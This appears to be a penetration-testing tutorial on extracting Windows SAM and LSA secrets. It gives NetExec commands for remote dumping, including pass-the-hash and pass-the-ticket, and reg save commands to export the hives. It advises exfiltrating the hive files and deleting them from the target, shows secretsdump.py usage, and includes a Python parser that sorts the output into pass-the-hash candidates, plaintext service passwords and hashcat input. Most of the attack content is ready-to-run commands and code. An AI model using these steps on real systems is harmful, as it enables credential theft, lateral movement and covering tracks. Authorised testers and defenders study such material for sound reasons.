SAM & LSA secrets

How to find local user passwords, hashes and secrets.

Overview

Windows keeps local account password hashes in the SAM registry hive and LSA secrets (including cached domain credentials) in the SECURITY hive. Both hives are encrypted with a boot key that lives in the SYSTEM hive, so all three are needed to recover anything.

A breakdown of the important hives is shown below:

SAM

Stores the password hashes of local user accounts in LM and/or NT hash format. Modern systems store only the NT hash; the LM field is left empty.

SECURITY

Stores the LSA secrets and cached domain logon information: service account and auto-logon passwords (often in plaintext), the machine account password (from which its NT hash and Kerberos DES/AES keys are derived), DPAPI system keys, domain cached credentials (DCC1 on pre-Vista systems, DCC2/MS-Cache v2 on later ones), and local security question answers (L$SQSA).

SYSTEM

Holds the boot key (SysKey) used to encrypt the SAM and the LSA secrets. It must be exported alongside the other two hives, because neither can be decrypted without it.

Remotely Dumping

The SAM and LSA secrets can be dumped remotely by reading the registry hives over the network (SMB and the remote registry service) and decrypting them with a credential extraction tool. NetExec performs various remote network tasks, including dumping the SAM and LSA secrets; the --sam and --lsa flags can be combined in a single run.

NetExec can authenticate to a remote Windows host with several credential types. Whichever type is used, the account must be a local administrator on the target, since the SAM and SECURITY hives are only readable with administrative rights:

Remote SAM/LSA secrets dump using domain user with local administrator privileges

netexec smb <Windows_IP> -d <domain> -u <user> -p <password> <--sam/--lsa>

Remote SAM/LSA secrets dump using local user with local administrator privileges

netexec smb <Windows_IP> --local-auth -u <user> -p <password> <--sam/--lsa>

Remote SAM/LSA secrets dump using pass-the-hash attack with local administrator user

netexec smb <Windows_IP> -d <domain> -u <user> -H <NT_hash> <--sam/--lsa>

Remote SAM/LSA secrets dump using pass-the-ticket (a Kerberos ticket in a ccache file) with a local administrator user. Kerberos authentication must target the host by its DNS name rather than its IP address, otherwise the service ticket will not match:

KRB5CCNAME=<ticket.ccache> netexec smb <Windows_FQDN> --use-kcache <--sam/--lsa>

Local Dumping

The Dump

The SAM and LSA secrets can be dumped locally by exporting the registry hives to disk and then feeding them to an offline credential extraction tool. The easiest way to export the hives is reg save from an elevated (administrator) command prompt. All three hives are needed, because the SYSTEM hive holds the boot key that decrypts the other two:

reg save HKLM\SAM "C:\Windows\Temp\sam"

reg save HKLM\SECURITY "C:\Windows\Temp\security"

reg save HKLM\SYSTEM "C:\Windows\Temp\system"

These three files are binary hive files. Exfiltrate them to your attack machine, and delete them from the target afterwards so they are not left behind for someone else to find.

Credential Extraction

secretsdump.py (from Impacket) decrypts the exported hives and prints the local SAM hashes, the cached domain credentials and the LSA secrets.

Run the command below on your attack machine, pointing it at the three hive files exported with the dump technique above. The LOCAL target tells it to work on the files rather than connect to a remote host:

secretsdump.py -sam '<sam_hive>' -security '<security_hive>' -system '<system_hive>' LOCAL
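What comes back from secretsdump.py is a few sections of uid:rid:lmhash:nthash lines, $DCC2$ cached credentials and raw LSA secrets, and the next job is to triage them. The following is an added example written for this page (it is not part of Impacket or of the original notes): a small parser for that output format, run over a constructed sample, that separates SAM hashes from DCC2 cached credentials and LSA secrets, drops accounts whose NT hash is the empty-password hash, flags NT hash reuse between local accounts, pulls plaintext service account passwords out of _SC_ secrets and emits hashcat-ready lines (mode 1000 for NT, mode 2100 for DCC2). Every username, hash and key in the sample is made up.

```python
import re

# Constructed sample of secretsdump.py output (no real credentials; all values
# are made up for this example). 31d6cfe0... is the NT hash of an empty password
# and aad3b435... is the empty LM hash that modern Windows always stores.
SAMPLE_OUTPUT = """\
[*] Target system bootKey: 0x0123456789abcdef0123456789abcdef
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Dumping cached domain logon information (domain/username:hash)
CORP.LOCAL/jdoe:$DCC2$10240#jdoe#e4e938d12fe5974dc42a90120bd9c90f: (2024-01-15 09:12:33)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CORP\\WS01$:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfb7ea8e9d3c2a1f0e9d8:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x7c1ad1dc8e6d7f4a9b2c3d4e5f60718293a4b5c6
dpapi_userkey:0x9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b3a291807
[*] _SC_BackupSvc
CORP\\svc_backup:Summer2024!
[*] Cleaning up...
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

SAM_LINE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::")
DCC2_LINE = re.compile(r"^(?P<domain>[^/]+)/(?P<user>[^:]+):\$DCC2\$(?P<iter>\d+)#[^#]+#(?P<hash>[0-9a-f]{32})")


def parse_secretsdump(text):
    """Split secretsdump output into SAM hashes, DCC2 cached creds and LSA secrets."""
    parsed = {"sam": [], "dcc2": [], "lsa": []}
    section = None
    secret_name = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("[*]"):
            banner = line[3:].strip()
            if banner.startswith("Dumping local SAM"):
                section = "sam"
            elif banner.startswith("Dumping cached domain"):
                section = "dcc2"
            elif banner.startswith("Dumping LSA Secrets"):
                section = "lsa"
            elif banner.startswith("Cleaning up"):
                section = None
            elif section == "lsa":
                secret_name = banner  # "[*] <name>" labels the secret printed on the next line(s)
            continue
        if section == "sam":
            m = SAM_LINE.match(line)
            if m:
                parsed["sam"].append({"user": m["user"], "rid": int(m["rid"]), "lm": m["lm"], "nt": m["nt"]})
        elif section == "dcc2":
            m = DCC2_LINE.match(line)
            if m:
                parsed["dcc2"].append({"domain": m["domain"], "user": m["user"],
                                       "iterations": int(m["iter"]), "hash": m["hash"]})
        elif section == "lsa":
            parsed["lsa"].append({"name": secret_name, "value": line})
    return parsed


def usable_nt_hashes(parsed):
    """SAM accounts whose NT hash is not the empty-password hash: pass-the-hash and cracking targets."""
    return [e for e in parsed["sam"] if e["nt"] != EMPTY_NT]


def shared_nt_hashes(parsed):
    """NT hashes used by more than one local account, i.e. password reuse between accounts."""
    by_hash = {}
    for e in usable_nt_hashes(parsed):
        by_hash.setdefault(e["nt"], []).append(e["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def plaintext_service_passwords(parsed):
    """Service account passwords from _SC_<service> LSA secrets (secretsdump prints account:password)."""
    found = []
    for e in parsed["lsa"]:
        if e["name"] and e["name"].startswith("_SC_") and ":" in e["value"]:
            account, password = e["value"].split(":", 1)
            found.append((e["name"][4:], account, password))
    return found


def hashcat_lines(parsed):
    """Crackable material keyed by hashcat mode: 1000 (NTLM) and 2100 (DCC2 / MS Cache v2)."""
    out = {1000: [], 2100: []}
    for e in usable_nt_hashes(parsed):
        out[1000].append(f"{e['user']}:{e['nt']}")  # feed to hashcat -m 1000 --username
    for e in parsed["dcc2"]:
        out[2100].append(f"$DCC2${e['iterations']}#{e['user']}#{e['hash']}")
    return out


if __name__ == "__main__":
    p = parse_secretsdump(SAMPLE_OUTPUT)
    print("PtH candidates:", [e["user"] for e in usable_nt_hashes(p)])
    print("Shared NT hashes:", shared_nt_hashes(p))
    print("Service passwords:", plaintext_service_passwords(p))
    for mode, lines in hashcat_lines(p).items():
        print(f"hashcat -m {mode}:", lines)
```

Run it against a real dump with parse_secretsdump(open("dump.txt").read()). The interesting findings for a pentester are usually the shared hashes (a local administrator hash reused on other hosts or by a service account is a lateral movement path) and the _SC_ secrets, which are already plaintext and need no cracking.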
